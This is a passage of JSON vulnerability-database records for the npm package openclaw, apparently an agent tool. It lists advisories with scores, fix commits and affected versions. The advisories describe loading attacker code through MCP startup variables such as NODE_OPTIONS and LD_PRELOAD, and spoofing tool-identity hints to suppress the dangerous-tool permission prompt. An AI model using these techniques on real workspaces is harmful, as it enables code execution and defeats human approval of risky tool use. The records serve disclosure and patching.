{ "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-p6j4-wvmc-vx2h" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rf6b-q7cj-jbgc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89057?format=api", "vulnerability_id": "VCID-rkx2-eq2x-q7d1", "summary": "Duplicate Advisory: OpenClaw: Remote media error responses could trigger unbounded memory allocation before failure\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-4qwc-c7g9-4xcw. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unbounded memory allocation vulnerability in remote media HTTP error handling that allows attackers to trigger excessive memory consumption. Attackers can send crafted HTTP error responses with large bodies to remote media endpoints, causing the application to allocate unbounded memory before failure handling occurs.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/81445a901091a5d27ef0b56fceedbe4724566438" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4qwc-c7g9-4xcw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35633" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unbounded-memory-allocation-via-remote-media-error-responses" }, { "reference_url": "https://github.com/advisories/GHSA-hm63-vwj4-mj2q", "reference_id": "GHSA-hm63-vwj4-mj2q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hm63-vwj4-mj2q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-hm63-vwj4-mj2q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rkx2-eq2x-q7d1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89604?format=api", "vulnerability_id": "VCID-rr6t-1193-ybgz", "summary": "OpenClaw: MCP stdio server env could load dangerous startup variables from workspace config\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace MCP stdio configuration could pass dangerous process-startup environment variables such as `NODE_OPTIONS`, `LD_PRELOAD`, or `BASH_ENV` to the spawned MCP server process. In a malicious workspace, this could make the MCP child load attacker-controlled code when the operator starts a session that uses that MCP server.\n\nThe impact is limited to local/workspace trust boundaries and requires the operator to run OpenClaw in a workspace containing the malicious MCP configuration. Severity is therefore medium, not high/critical.\n\n## Fix\n\nOpenClaw now filters MCP stdio environment entries through the host environment safety denylist before spawning stdio MCP servers.\n\nFix commits:\n\n- `62fa5071896e95edc7f67d1cebc70a2859e283af`\n- `85d86ebc4bf3d2226d39d132a484f4f7a299fa1b`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44995", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01944", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01954", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01946", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44995" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/62fa5071896e95edc7f67d1cebc70a2859e283af", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/62fa5071896e95edc7f67d1cebc70a2859e283af" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/85d86ebc4bf3d2226d39d132a484f4f7a299fa1b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mj59-h3q9-ghfh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44995", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44995" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "5.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T17:56:23Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-mcp-stdio-environment-variables" }, { "reference_url": "https://github.com/advisories/GHSA-mj59-h3q9-ghfh", "reference_id": "GHSA-mj59-h3q9-ghfh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mj59-h3q9-ghfh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "CVE-2026-44995", "GHSA-mj59-h3q9-ghfh" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rr6t-1193-ybgz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91642?format=api", "vulnerability_id": "VCID-rswr-nd6z-vuhe", "summary": "OpenClaw's Conflicting Tool Identity Hints Bypass Dangerous-Tool Prompting\n## Summary\nACP permission resolution trusted conflicting tool identity hints from rawInput and metadata, which could suppress dangerous-tool prompting.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `e4c61723cd2d530680cc61789311d464ab8cdf60`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/acp/client.ts now fails closed when meta, rawInput, and title tool identities conflict instead of trusting spoofable raw input.\n- src/acp/client.test.ts ships regressions for conflicting tool identity hints and dangerous-tool prompting.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": 